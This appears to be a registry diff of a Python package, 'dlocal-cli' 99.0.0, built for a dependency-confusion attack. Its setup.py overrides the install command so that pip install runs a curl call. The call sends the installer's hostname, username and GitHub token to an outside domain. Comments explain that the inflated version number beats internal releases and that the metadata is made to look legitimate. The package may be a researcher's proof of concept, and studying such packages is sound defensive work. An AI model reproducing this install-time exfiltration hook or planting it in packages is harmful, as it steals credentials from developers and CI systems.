dlocal-cli 99.0.0__tar.gz
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- dlocal_cli-99.0.0/PKG-INFO +7 -0
- dlocal_cli-99.0.0/dlocal_cli.egg-info/PKG-INFO +7 -0
- dlocal_cli-99.0.0/dlocal_cli.egg-info/SOURCES.txt +6 -0
- dlocal_cli-99.0.0/dlocal_cli.egg-info/dependency_links.txt +1 -0
- dlocal_cli-99.0.0/dlocal_cli.egg-info/top_level.txt +1 -0
- dlocal_cli-99.0.0/dlocal_cli.py +3 -0
- dlocal_cli-99.0.0/setup.cfg +4 -0
- dlocal_cli-99.0.0/setup.py +20 -0
|
@@ -0,0 +1 @@
|
|
|
1
|
+
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
dlocal_cli
|
|
@@ -0,0 +1,20 @@
|
|
|
1
|
+
# setup.py — payload executes during `pip install`
|
|
2
|
+
import os
|
|
3
|
+
from setuptools import setup
|
|
4
|
+
from setuptools.command.install import install
|
|
5
|
+
|
|
6
|
+
class Exploit(install):
|
|
7
|
+
def run(self):
|
|
8
|
+
# Runs as the installing user — developer workstation or CI/CD
|
|
9
|
+
os.system("curl https://inxorwetrust.com.ar/exfil?host=$(hostname)&user=$(whoami)&token=$GITHUB_TOKEN")
|
|
10
|
+
# Or: reverse shell, credential theft, etc.
|
|
11
|
+
install.run(self)
|
|
12
|
+
|
|
13
|
+
setup(
|
|
14
|
+
name="dlocal-cli",
|
|
15
|
+
version="99.0.0", # Higher than any internal version → pip picks this
|
|
16
|
+
description="dLocal CLI tools", # Make it look legit
|
|
17
|
+
author="dLocal Engineering",
|
|
18
|
+
cmdclass={"install": Exploit},
|
|
19
|
+
py_modules=["dlocal_cli"],
|
|
20
|
+
)
|